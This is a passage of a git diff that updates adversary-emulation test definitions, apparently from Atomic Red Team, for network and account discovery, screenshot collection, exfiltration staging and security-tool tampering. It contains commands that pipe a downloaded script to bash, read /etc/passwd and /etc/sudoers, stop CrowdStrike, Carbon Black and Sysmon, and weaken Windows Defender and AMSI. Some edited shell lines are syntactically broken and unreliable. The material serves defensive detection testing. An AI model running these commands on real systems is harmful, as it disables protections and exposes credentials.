missing from the machine. skipping..."; fi; + if [ -x "$(command -v netstat)" ]; then netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c; else echo "netstat is missing from the machine. skipping..."; fi; - name: System Network Configuration Discovery (TrickBot Style) description: | Identify network configuration information as seen by Trickbot and described here https://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/ @@ -19796,6 +20029,12 @@ discovery: supported_platforms: - linux - macos + dependency_executor_name: sh + dependencies: + - description: Check if netstat command exists on the machine + prereq_command: if [ -x "$(command -v netstat)" ]; then exit 0; else exit + 1; + get_prereq_command: echo "Install netstat on the machine."; exit 1; executor: name: sh elevation_required: false @@ -28117,10 +28356,15 @@ collection: supported_platforms: - linux - macos + input_arguments: + output_file: + description: Location to save downloaded discovery.bat file + type: Path + default: "/tmp/T1074_discovery.log" executor: name: bash command: 'curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.sh - | bash -s > /tmp/discovery.log + | bash -s > #{output_file} ' - name: Zip a Folder with PowerShell for Staging in Temp @@ -28508,12 +28752,15 @@ collection: output_file: description: Output file path type: Path - default: desktop.png + default: "/tmp/T1113_desktop.png" executor: name: bash elevation_required: false command: 'screencapture #{output_file} +' + cleanup_command: 'rm #{output_file} + ' - name: Screencapture (silent) description: 'Use screencapture command to collect a full desktop screenshot @@ -28525,12 +28772,15 @@ collection: output_file: description: Output file path type: Path - default: desktop.png + default: "/tmp/T1113_desktop.png" executor: name: bash elevation_required: false command: 'screencapture -x #{output_file} +' + cleanup_command: 'rm #{output_file} + ' - name: X Windows Capture description: 'Use xwd command to collect a full desktop screenshot and review @@ -28543,12 +28793,15 @@ collection: output_file: description: Output file path type: Path - default: desktop.xwd + default: "/tmp/T1113_desktop.xwd" executor: name: bash command: | xwd -root -out #{output_file} xwud -in #{output_file} + cleanup_command: 'rm #{output_file} + +' - name: Import description: 'Use import command to collect a full desktop screenshot @@ -28559,11 +28812,14 @@ collection: output_file: description: Output file path type: Path - default: desktop.png + default: "/tmp/T1113_desktop.png" executor: name: bash command: 'import -window root #{output_file} +' + cleanup_command: 'rm #{output_file} + ' exfiltration: '': @@ -28888,21 +29144,35 @@ exfiltration: supported_platforms: - macos - linux + input_arguments: + test_folder: + description: Path used to store files. + type: Path + default: "/tmp/T1022" + test_file: + description: Temp file used to store encrypted data. + type: Path + default: T1022 + encryption_password: + description: Password used to encrypt data. + type: string + default: InsertPasswordHere + dependency_executor_name: sh + dependencies: + - description: gpg and zip are required to run the test. + prereq_command: if [ ! -x "$(command -v gpg)" ] || [ ! -x "$(command -v zip)" + ]; then exit 1; fi; + get_prereq_command: echo "Install gpg and zip to run the test"; exit 1; executor: name: sh elevation_required: false - prereq_command: which gpg command: | - mkdir /tmp/victim-files - cd /tmp/victim-files - touch a b c d e f g - echo "creating zip with password 'insert password here'" - zip --password "insert password here" ./victim-files.zip ./* - echo "encrypting file with gpg, you will need to provide a password" - gpg -c /tmp/victim-files/victim-filex.zip - # - ls -l - cleanup_command: 'rm -Rf /tmp/victim-files + mkdir -p #{test_folder} + cd #{test_folder}; touch a b c d e f g + zip --password "#{encryption_password}" #{test_folder}/#{test_file} ./* + echo "#{encryption_password}" | gpg --batch --yes --passphrase-fd 0 --output #{test_folder}/#{test_file}.zip.gpg -c #{test_folder}/#{test_file}.zip + ls -l #{test_folder} + cleanup_command: 'rm -Rf #{test_folder} ' - name: Compress Data and lock with password for Exfiltration with winrar @@ -29026,14 +29296,33 @@ exfiltration: supported_platforms: - macos - linux + input_arguments: + folder_path: + description: Path where the test creates artifacts + type: Path + default: "/tmp/T1030" + file_name: + description: File name + type: Path + default: T1030_urandom + dependency_executor_name: sh + dependencies: + - description: The file must exist for the test to run. + prereq_command: 'if [ ! -f #{folder_path}/#{file_name} ]; then exit 1; else + exit 0; fi;' + get_prereq_command: "if [ ! -d #{folder_path} ]; then mkdir -p #{folder_path}; + touch #{folder_path}/safe_to_delete; fi; \ndd if=/dev/urandom of=#{folder_path}/#{file_name} + bs=25000000 count=1" executor: name: sh elevation_required: false command: | - cd /tmp/ - dd if=/dev/urandom of=/tmp/victim-whole-file bs=25M count=1 - split -b 5000000 /tmp/victim-whole-file - ls -l + cd #{folder_path}; split -b 5000000 #{file_name} + ls -l #{folder_path} + cleanup_command: 'if [ -f #{folder_path}/safe_to_delete ]; then rm -rf #{folder_path}; + fi; + +' T1048: technique: x_mitre_data_sources: diff --git a/atomics/T1016/T1016.md b/atomics/T1016/T1016.md index 5fd7d098..fb09188b 100644 --- a/atomics/T1016/T1016.md +++ b/atomics/T1016/T1016.md @@ -6,7 +6,7 @@ Adversaries may use the information from [System Network Configuration Discovery ## Atomic Tests -- [Atomic Test #1 - System Network Configuration Discovery](#atomic-test-1---system-network-configuration-discovery) +- [Atomic Test #1 - System Network Configuration Discovery on Windows](#atomic-test-1---system-network-configuration-discovery-on-windows) - [Atomic Test #2 - List Windows Firewall Rules](#atomic-test-2---list-windows-firewall-rules) @@ -19,7 +19,7 @@ Adversaries may use the information from [System Network Configuration Discovery
-## Atomic Test #1 - System Network Configuration Discovery +## Atomic Test #1 - System Network Configuration Discovery on Windows Identify network configuration information Upon successful execution, cmd.exe will spawn multiple commands to list network configuration settings. Output will be via stdout. @@ -90,9 +90,10 @@ Upon successful execution, sh will spawn multiple commands and output will be vi ```sh -arp -a -netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c -ifconfig +if [ -x "$(command -v arp)" ]; then arp -a; else echo "arp is missing from the machine. skipping..."; fi; +if [ -x "$(command -v ifconfig)" ]; then ifconfig; else echo "ifconfig is missing from the machine. skipping..."; fi; +if [ -x "$(command -v ip)" ]; then ip addr; else echo "ip is missing from the machine. skipping..."; fi; +if [ -x "$(command -v netstat)" ]; then netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c; else echo "netstat is missing from the machine. skipping..."; fi; ``` diff --git a/atomics/T1018/T1018.md b/atomics/T1018/T1018.md index 8ddf3733..e48b2e68 100644 --- a/atomics/T1018/T1018.md +++ b/atomics/T1018/T1018.md @@ -197,6 +197,18 @@ arp -a | grep -v '^?' +#### Dependencies: Run with `sh`! +##### Description: Check if arp command exists on the machine +##### Check Prereq Commands: +```sh +if [ -x "$(command -v arp)" ]; then exit 0; else exit 1; +``` +##### Get Prereq Commands: +```sh +echo "Install arp on the machine."; exit 1; +``` + +
@@ -212,12 +224,19 @@ Upon successful execution, sh will perform a ping sweep on the 192.168.1.1/24 an +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| subnet | Subnet used for ping sweep. | string | 192.168.1| +| start_host | Subnet used for ping sweep. | string | 1| +| stop_host | Subnet used for ping sweep. | string | 254| + #### Attack Commands: Run with `sh`! ```sh -for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip; [ $? -eq 0 ] && echo "192.168.1.$ip UP" || : ; done +for ip in $(seq #{start_host} #{stop_host}); do ping -c 1 #{subnet}.$ip; [ $? -eq 0 ] && echo "#{subnet}.$ip UP" || : ; done ``` diff --git a/atomics/T1022/T1022.md b/atomics/T1022/T1022.md index e43b3c37..133c482f 100644 --- a/atomics/T1022/T1022.md +++ b/atomics/T1022/T1022.md @@ -25,29 +25,44 @@ Encrypt data for exiltration +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| test_folder | Path used to store files. | Path | /tmp/T1022| +| test_file | Temp file used to store encrypted data. | Path | T1022| +| encryption_password | Password used to encrypt data. | string | InsertPasswordHere| + #### Attack Commands: Run with `sh`! ```sh -mkdir /tmp/victim-files -cd /tmp/victim-files -touch a b c d e f g -echo "creating zip with password 'insert password here'" -zip --password "insert password here" ./victim-files.zip ./* -echo "encrypting file with gpg, you will need to provide a password" -gpg -c /tmp/victim-files/victim-filex.zip -# -ls -l +mkdir -p #{test_folder} +cd #{test_folder}; touch a b c d e f g +zip --password "#{encryption_password}" #{test_folder}/#{test_file} ./* +echo "#{encryption_password}" | gpg --batch --yes --passphrase-fd 0 --output #{test_folder}/#{test_file}.zip.gpg -c #{test_folder}/#{test_file}.zip +ls -l #{test_folder} ``` #### Cleanup Commands: ```sh -rm -Rf /tmp/victim-files +rm -Rf #{test_folder} ``` +#### Dependencies: Run with `sh`! +##### Description: +##### Check Prereq Commands: +```sh +if [ ! -x "$(command -v gpg)" ] || [ ! -x "$(command -v zip)" ]; then exit 1; fi; +``` +##### Get Prereq Commands: +```sh +echo "Install gpg and zip to run the test"; exit 1; +``` + +
diff --git a/atomics/T1030/T1030.md b/atomics/T1030/T1030.md index 7e15333b..b8be89a2 100644 --- a/atomics/T1030/T1030.md +++ b/atomics/T1030/T1030.md @@ -17,20 +17,41 @@ Take a file/directory, split it into 5Mb chunks +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| folder_path | Path where the test creates artifacts | Path | /tmp/T1030| +| file_name | File name | Path | T1030_urandom| + #### Attack Commands: Run with `sh`! ```sh -cd /tmp/ -dd if=/dev/urandom of=/tmp/victim-whole-file bs=25M count=1 -split -b 5000000 /tmp/victim-whole-file -ls -l +cd #{folder_path}; split -b 5000000 #{file_name} +ls -l #{folder_path} +``` + +#### Cleanup Commands: +```sh +if [ -f #{folder_path}/safe_to_delete ]; then rm -rf #{folder_path}; fi; +``` + + + +#### Dependencies: Run with `sh`! +##### Description: +##### Check Prereq Commands: +```sh +if [ ! -f #{folder_path}/#{file_name} ]; then exit 1; else exit 0; fi; +``` +##### Get Prereq Commands: +```sh +if [ ! -d #{folder_path} ]; then mkdir -p #{folder_path}; touch #{folder_path}/safe_to_delete; fi; +dd if=/dev/urandom of=#{folder_path}/#{file_name} bs=25000000 count=1 ``` - -
diff --git a/atomics/T1046/T1046.md b/atomics/T1046/T1046.md index 943bbe3f..fb27e171 100644 --- a/atomics/T1046/T1046.md +++ b/atomics/T1046/T1046.md @@ -72,6 +72,18 @@ nc -nv #{host} #{port} +#### Dependencies: Run with `sh`! +##### Description: Check if nmap command exists on the machine +##### Check Prereq Commands: +```sh +if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1; +``` +##### Get Prereq Commands: +```sh +echo "Install nmap on the machine to run the test."; exit 1; +``` + +
diff --git a/atomics/T1049/T1049.md b/atomics/T1049/T1049.md index 774c30a5..e589cd9f 100644 --- a/atomics/T1049/T1049.md +++ b/atomics/T1049/T1049.md @@ -99,6 +99,18 @@ who -a +#### Dependencies: Run with `sh`! +##### Description: Check if netstat command exists on the machine +##### Check Prereq Commands: +```sh +if [ -x "$(command -v netstat)" ]; then exit 0; else exit 1; +``` +##### Get Prereq Commands: +```sh +echo "Install netstat on the machine."; exit 1; +``` + +
diff --git a/atomics/T1069/T1069.md b/atomics/T1069/T1069.md index 5761eab7..978e1a43 100644 --- a/atomics/T1069/T1069.md +++ b/atomics/T1069/T1069.md @@ -46,9 +46,9 @@ Permission Groups Discovery ```sh -dscacheutil -q group -dscl . -list /Groups -groups +if [ -x "$(command -v dscacheutil)" ]; then dscacheutil -q group; else echo "dscacheutil is missing from the machine. skipping..."; fi; fi; +if [ -x "$(command -v dscl)" ]; then dscl . -list /Groups; else echo "dscl is missing from the machine. skipping..."; fi; +if [ -x "$(command -v groups)" ]; then groups; else echo "groups is missing from the machine. skipping..."; fi; ``` diff --git a/atomics/T1074/T1074.md b/atomics/T1074/T1074.md index 013cd8d4..1967b373 100644 --- a/atomics/T1074/T1074.md +++ b/atomics/T1074/T1074.md @@ -57,12 +57,17 @@ Utilize curl to download discovery.sh and execute a basic information gathering +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| output_file | Location to save downloaded discovery.bat file | Path | /tmp/T1074_discovery.log| + #### Attack Commands: Run with `bash`! ```bash -curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.sh | bash -s > /tmp/discovery.log +curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.sh | bash -s > #{output_file} ``` diff --git a/atomics/T1082/T1082.md b/atomics/T1082/T1082.md index 3f757a7c..3e2ead2b 100644 --- a/atomics/T1082/T1082.md +++ b/atomics/T1082/T1082.md @@ -71,7 +71,7 @@ reg query HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum ## Atomic Test #2 - System Information Discovery Identify System Info -**Supported Platforms:** Linux, macOS +**Supported Platforms:** macOS @@ -81,7 +81,6 @@ Identify System Info ```sh -systemsetup system_profiler ls -al /Applications ``` @@ -102,18 +101,28 @@ Identify System Info +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| output_file | Output file used to store the results. | path | /tmp/T1082.txt| + #### Attack Commands: Run with `sh`! ```sh -uname -a >> /tmp/loot.txt -cat /etc/lsb-release >> /tmp/loot.txt -cat /etc/redhat-release >> /tmp/loot.txt -uptime >> /tmp/loot.txt -cat /etc/issue >> /tmp/loot.txt +uname -a >> #{output_file} +if [ -f /etc/lsb-release ]; then cat /etc/lsb-release >> #{output_file}; fi; +if [ -f /etc/redhat-release ]; then cat /etc/redhat-release >> #{output_file}; fi; +if [ -f /etc/issue ]; then cat /etc/issue >> #{output_file}; fi; +uptime >> #{output_file} +cat #{output_file} 2>/dev/null ``` +#### Cleanup Commands: +```sh +rm #{output_file} 2>/dev/null +``` @@ -135,14 +144,14 @@ Identify virtual machine hardware. This technique is used by the Pupy RAT and ot ```bash -cat /sys/class/dmi/id/bios_version | grep -i amazon -cat /sys/class/dmi/id/product_name | grep -i "Droplet\|HVM\|VirtualBox\|VMware" -cat /sys/class/dmi/id/chassis_vendor | grep -i "Xen\|Bochs\|QEMU" -sudo dmidecode | grep -i "microsoft\|vmware\|virtualbox\|quemu\|domu" -cat /proc/scsi/scsi | grep -i "vmware\|vbox" -cat /proc/ide/hd0/model | grep -i "vmware\|vbox\|qemu\|virtual" -sudo lspci | grep -i "vmware\|virtualbox" -sudo lscpu | grep -i "Xen\|KVM\|Microsoft" +if [ -f /sys/class/dmi/id/bios_version ]; then cat /sys/class/dmi/id/bios_version | grep -i amazon; fi; +if [ -f /sys/class/dmi/id/product_name ]; then cat /sys/class/dmi/id/product_name | grep -i "Droplet\|HVM\|VirtualBox\|VMware"; fi; +if [ -f /sys/class/dmi/id/product_name ]; then cat /sys/class/dmi/id/chassis_vendor | grep -i "Xen\|Bochs\|QEMU"; fi; +if [ -x "$(command -v dmidecode)" ]; then sudo dmidecode | grep -i "microsoft\|vmware\|virtualbox\|quemu\|domu"; fi; +if [ -f /proc/scsi/scsi ]; then cat /proc/scsi/scsi | grep -i "vmware\|vbox"; fi; +if [ -f /proc/ide/hd0/model ]; then cat /proc/ide/hd0/model | grep -i "vmware\|vbox\|qemu\|virtual"; fi; +if [ -x "$(command -v lspci)" ]; then sudo lspci | grep -i "vmware\|virtualbox" +if [ -x "$(command -v lscpu)" ]; then sudo lscpu | grep -i "Xen\|KVM\|Microsoft" ``` diff --git a/atomics/T1083/T1083.md b/atomics/T1083/T1083.md index a7cd04eb..645eab0b 100644 --- a/atomics/T1083/T1083.md +++ b/atomics/T1083/T1083.md @@ -94,20 +94,30 @@ https://perishablepress.com/list-files-folders-recursively-terminal/ +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| output_file | Output file used to store the results. | path | /tmp/T1083.txt| + #### Attack Commands: Run with `sh`! ```sh -ls -a > allcontents.txt -ls -la /Library/Preferences/ > detailedprefsinfo.txt -file */* *>> ../files.txt +ls -a >> #{output_file} +if [ -d /Library/Preferences/ ]; then ls -la /Library/Preferences/ > #{output_file}; fi; +file */* *>> #{output_file} +cat #{output_file} 2>/dev/null find . -type f ls -R | grep ":$" | sed -e 's/:$//' -e 's/[^-][^\/]*\//--/g' -e 's/^/ /' -e 's/-/|/' locate * which sh ``` +#### Cleanup Commands: +```sh +rm #{output_file} +``` @@ -124,20 +134,30 @@ Find or discover files on the file system +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| output_file | Output file used to store the results. | path | /tmp/T1083.txt| + #### Attack Commands: Run with `sh`! ```sh -cd $HOME && find . -print | sed -e 's;[^/]*/;|__;g;s;__|; |;g' > /tmp/loot.txt -cat /etc/mtab > /tmp/loot.txt -find . -type f -iname *.pdf > /tmp/loot.txt +cd $HOME && find . -print | sed -e 's;[^/]*/;|__;g;s;__|; |;g' > #{output_file} +if [ -f /etc/mtab ]; then cat /etc/mtab >> #{output_file}; fi; +find . -type f -iname *.pdf >> #{output_file} +cat #{output_file}; fi; find . -type f -name ".*" ``` +#### Cleanup Commands: +```sh +rm #{output_file} +``` + -
diff --git a/atomics/T1087/T1087.md b/atomics/T1087/T1087.md index 0b1edb1e..00f839ac 100644 --- a/atomics/T1087/T1087.md +++ b/atomics/T1087/T1087.md @@ -62,7 +62,7 @@ Enumerate all accounts by copying /etc/passwd to another file #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| output_file | Path where captured results will be placed | Path | ~/loot.txt| +| output_file | Path where captured results will be placed | Path | /tmp/T1087.txt| #### Attack Commands: Run with `sh`! @@ -70,8 +70,13 @@ Enumerate all accounts by copying /etc/passwd to another file ```sh cat /etc/passwd > #{output_file} +cat #{output_file} ``` +#### Cleanup Commands: +```sh +rm -f #{output_file} +``` @@ -91,16 +96,21 @@ cat /etc/passwd > #{output_file} #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| output_file | Path where captured results will be placed | Path | ~/loot.txt| +| output_file | Path where captured results will be placed | Path | /tmp/T1087.txt| -#### Attack Commands: Run with `sh`! +#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin) ```sh cat /etc/sudoers > #{output_file} +cat #{output_file} ``` +#### Cleanup Commands: +```sh +rm -f #{output_file} +``` @@ -120,7 +130,7 @@ View accounts wtih UID 0 #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| output_file | Path where captured results will be placed | Path | ~/loot.txt| +| output_file | Path where captured results will be placed | Path | /tmp/T1087.txt| #### Attack Commands: Run with `sh`! @@ -128,8 +138,13 @@ View accounts wtih UID 0 ```sh grep 'x:0:' /etc/passwd > #{output_file} +cat #{output_file} 2>/dev/null ``` +#### Cleanup Commands: +```sh +rm -f #{output_file} 2>/dev/null +``` @@ -173,7 +188,7 @@ Show if a user account has ever logged in remotely #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| output_file | Path where captured results will be placed | Path | ~/loot.txt| +| output_file | Path where captured results will be placed | Path | /tmp/T1087.txt| #### Attack Commands: Run with `sh`! @@ -181,10 +196,27 @@ Show if a user account has ever logged in remotely ```sh lastlog > #{output_file} +cat #{output_file} +``` + +#### Cleanup Commands: +```sh +rm -f #{output_file} ``` +#### Dependencies: Run with `sh`! +##### Description: Check if lastlog command exists on the machine +##### Check Prereq Commands: +```sh +if [ -x "$(command -v lastlog)" ]; then exit 0; else exit 1; +``` +##### Get Prereq Commands: +```sh +echo "Install lastlog on the machine to run the test."; exit 1; +``` + diff --git a/atomics/T1089/T1089.md b/atomics/T1089/T1089.md index f629abf8..bf07e8d7 100644 --- a/atomics/T1089/T1089.md +++ b/atomics/T1089/T1089.md @@ -12,35 +12,41 @@ - [Atomic Test #4 - Disable SELinux](#atomic-test-4---disable-selinux) -- [Atomic Test #5 - Disable Carbon Black Response](#atomic-test-5---disable-carbon-black-response) +- [Atomic Test #5 - Stop Crowdstrike Falcon on Linux](#atomic-test-5---stop-crowdstrike-falcon-on-linux) -- [Atomic Test #6 - Disable LittleSnitch](#atomic-test-6---disable-littlesnitch) +- [Atomic Test #6 - Disable Carbon Black Response](#atomic-test-6---disable-carbon-black-response) -- [Atomic Test #7 - Disable OpenDNS Umbrella](#atomic-test-7---disable-opendns-umbrella) +- [Atomic Test #7 - Disable LittleSnitch](#atomic-test-7---disable-littlesnitch) -- [Atomic Test #8 - Unload Sysmon Filter Driver](#atomic-test-8---unload-sysmon-filter-driver) +- [Atomic Test #8 - Disable OpenDNS Umbrella](#atomic-test-8---disable-opendns-umbrella) -- [Atomic Test #9 - Disable Windows IIS HTTP Logging](#atomic-test-9---disable-windows-iis-http-logging) +- [Atomic Test #9 - Stop and unload Crowdstrike Falcon on macOS](#atomic-test-9---stop-and-unload-crowdstrike-falcon-on-macos) -- [Atomic Test #10 - Uninstall Sysmon](#atomic-test-10---uninstall-sysmon) +- [Atomic Test #10 - Unload Sysmon Filter Driver](#atomic-test-10---unload-sysmon-filter-driver) -- [Atomic Test #11 - AMSI Bypass - AMSI InitFailed](#atomic-test-11---amsi-bypass---amsi-initfailed) +- [Atomic Test #11 - Disable Windows IIS HTTP Logging](#atomic-test-11---disable-windows-iis-http-logging) -- [Atomic Test #12 - AMSI Bypass - Remove AMSI Provider Reg Key](#atomic-test-12---amsi-bypass---remove-amsi-provider-reg-key) +- [Atomic Test #12 - Uninstall Sysmon](#atomic-test-12---uninstall-sysmon) -- [Atomic Test #13 - Disable Arbitrary Security Windows Service](#atomic-test-13---disable-arbitrary-security-windows-service) +- [Atomic Test #13 - AMSI Bypass - AMSI InitFailed](#atomic-test-13---amsi-bypass---amsi-initfailed) -- [Atomic Test #14 - Tamper with Windows Defender ATP PowerShell](#atomic-test-14---tamper-with-windows-defender-atp-powershell) +- [Atomic Test #14 - AMSI Bypass - Remove AMSI Provider Reg Key](#atomic-test-14---amsi-bypass---remove-amsi-provider-reg-key) -- [Atomic Test #15 - Tamper with Windows Defender Command Prompt](#atomic-test-15---tamper-with-windows-defender-command-prompt) +- [Atomic Test #15 - Disable Arbitrary Security Windows Service](#atomic-test-15---disable-arbitrary-security-windows-service) -- [Atomic Test #16 - Tamper with Windows Defender Registry](#atomic-test-16---tamper-with-windows-defender-registry) +- [Atomic Test #16 - Tamper with Windows Defender ATP PowerShell](#atomic-test-16---tamper-with-windows-defender-atp-powershell) -- [Atomic Test #17 - Disable Microft Office Security Features](#atomic-test-17---disable-microft-office-security-features) +- [Atomic Test #17 - Tamper with Windows Defender Command Prompt](#atomic-test-17---tamper-with-windows-defender-command-prompt) -- [Atomic Test #18 - Remove Windows Defender Definition Files](#atomic-test-18---remove-windows-defender-definition-files) +- [Atomic Test #18 - Tamper with Windows Defender Registry](#atomic-test-18---tamper-with-windows-defender-registry) -- [Atomic Test #19 - Stop and Remove Arbitrary Security Windows Service](#atomic-test-19---stop-and-remove-arbitrary-security-windows-service) +- [Atomic Test #19 - Disable Microft Office Security Features](#atomic-test-19---disable-microft-office-security-features) + +- [Atomic Test #20 - Remove Windows Defender Definition Files](#atomic-test-20---remove-windows-defender-definition-files) + +- [Atomic Test #21 - Stop and Remove Arbitrary Security Windows Service](#atomic-test-21---stop-and-remove-arbitrary-security-windows-service) + +- [Atomic Test #22 - Uninstall Crowdstrike Falcon on Windows](#atomic-test-22---uninstall-crowdstrike-falcon-on-windows)
@@ -164,7 +170,37 @@ setenforce 0

-## Atomic Test #5 - Disable Carbon Black Response +## Atomic Test #5 - Stop Crowdstrike Falcon on Linux +Stop and disable Crowdstrike Falcon on Linux + +**Supported Platforms:** Linux + + + + + +#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin) + + +```sh +sudo systemctl stop falcon-sensor.service +sudo systemctl disable falcon-sensor.service +``` + +#### Cleanup Commands: +```sh +sudo systemctl enable falcon-sensor.service +sudo systemctl start falcon-sensor.service +``` + + + + + +
+
+ +## Atomic Test #6 - Disable Carbon Black Response Disables Carbon Black Response **Supported Platforms:** macOS @@ -188,7 +224,7 @@ sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.daemon.plist

-## Atomic Test #6 - Disable LittleSnitch +## Atomic Test #7 - Disable LittleSnitch Disables LittleSnitch **Supported Platforms:** macOS @@ -212,7 +248,7 @@ sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist

-## Atomic Test #7 - Disable OpenDNS Umbrella +## Atomic Test #8 - Disable OpenDNS Umbrella Disables OpenDNS Umbrella **Supported Platforms:** macOS @@ -236,7 +272,38 @@ sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfig

-## Atomic Test #8 - Unload Sysmon Filter Driver +## Atomic Test #9 - Stop and unload Crowdstrike Falcon on macOS +Stop and unload Crowdstrike Falcon daemons falcond and userdaemon on macOS + +**Supported Platforms:** macOS + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| falcond_plist | The path of the Crowdstrike Falcon plist file | path | /Library/LaunchDaemons/com.crowdstrike.falcond.plist| +| userdaemon_plist | The path of the Crowdstrike Userdaemon plist file | path | /Library/LaunchDaemons/com.crowdstrike.userdaemon.plist| + + +#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin) + + +```sh +sudo launchctl unload #{falcond_plist} +sudo launchctl unload #{userdaemon_plist} +``` + + + + + + +
+
+ +## Atomic Test #10 - Unload Sysmon Filter Driver Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service. To verify successful execution, o verify successful execution, run the prereq_command's and it should fail with an error of "sysmon filter must be loaded". @@ -307,7 +374,7 @@ sysmon -accepteula -i

-## Atomic Test #9 - Disable Windows IIS HTTP Logging +## Atomic Test #11 - Disable Windows IIS HTTP Logging Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union). This action requires HTTP logging configurations in IIS to be unlocked. @@ -341,7 +408,7 @@ C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:htt

-## Atomic Test #10 - Uninstall Sysmon +## Atomic Test #12 - Uninstall Sysmon Uninstall Sysinternals Sysmon for Defense Evasion **Supported Platforms:** Windows @@ -399,7 +466,7 @@ cmd /c sysmon -i -accepteula

-## Atomic Test #11 - AMSI Bypass - AMSI InitFailed +## Atomic Test #13 - AMSI Bypass - AMSI InitFailed Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true. Upon execution, no output is displayed. @@ -430,7 +497,7 @@ https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/

-## Atomic Test #12 - AMSI Bypass - Remove AMSI Provider Reg Key +## Atomic Test #14 - AMSI Bypass - Remove AMSI Provider Reg Key With administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection. This test removes the Windows Defender provider registry key. Upon execution, no output is displayed. Open Registry Editor and navigate to "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\" to verify that it is gone. @@ -460,7 +527,7 @@ New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4

-## Atomic Test #13 - Disable Arbitrary Security Windows Service +## Atomic Test #15 - Disable Arbitrary Security Windows Service With administrative rights, an adversary can disable Windows Services related to security products. This test requires McAfeeDLPAgentService to be installed. Change the service_name input argument for your AV solution. Upon exeuction, infomration will be displayed stating the status of the service. To verify that the service has stopped, run "sc query McAfeeDLPAgentService" @@ -497,7 +564,7 @@ net.exe start #{service_name} >nul 2>&1

-## Atomic Test #14 - Tamper with Windows Defender ATP PowerShell +## Atomic Test #16 - Tamper with Windows Defender ATP PowerShell Attempting to disable scheduled scanning and other parts of windows defender atp. Upon execution Virus and Threat Protection will show as disabled in Windows settings. @@ -532,7 +599,7 @@ Set-MpPreference -DisableBlockAtFirstSeen 0

-## Atomic Test #15 - Tamper with Windows Defender Command Prompt +## Atomic Test #17 - Tamper with Windows Defender Command Prompt Attempting to disable scheduled scanning and other parts of windows defender atp. These commands must be run as System, so they still fail as administrator. However, adversaries do attempt to perform this action so monitoring for these command lines can help alert to other bad things going on. Upon execution, "Access Denied" will be displayed twice and the WinDefend service status will be displayed. @@ -565,7 +632,7 @@ sc config WinDefend start=enabled >nul 2>&1

-## Atomic Test #16 - Tamper with Windows Defender Registry +## Atomic Test #18 - Tamper with Windows Defender Registry Disable Windows Defender from starting after a reboot. Upen execution, if the computer is rebooted the entire Virus and Threat protection window in Settings will be grayed out and have no info. @@ -594,7 +661,7 @@ Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name Disa

-## Atomic Test #17 - Disable Microft Office Security Features +## Atomic Test #19 - Disable Microft Office Security Features Gorgon group may disable Office security features so that their code can run. Upon execution, an external document will not show any warning before editing the document. @@ -633,7 +700,7 @@ Remove-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\Protected

-## Atomic Test #18 - Remove Windows Defender Definition Files +## Atomic Test #20 - Remove Windows Defender Definition Files Removing definition files would cause ATP to not fire for AntiMalware. Check MpCmdRun.exe man page for info on all arguments. On later viersions of windows (1909+) this command fails even with admin due to inusfficient privelages. On older versions of windows the command will say completed. @@ -661,7 +728,7 @@ https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-

-## Atomic Test #19 - Stop and Remove Arbitrary Security Windows Service +## Atomic Test #21 - Stop and Remove Arbitrary Security Windows Service Beginning with Powershell 6.0, the Stop-Service cmdlet sends a stop message to the Windows Service Controller for each of the specified services. The Remove-Service cmdlet removes a Windows service in the registry and in the service database. **Supported Platforms:** Windows @@ -688,4 +755,33 @@ Remove-Service -Name #{service_name} +
+
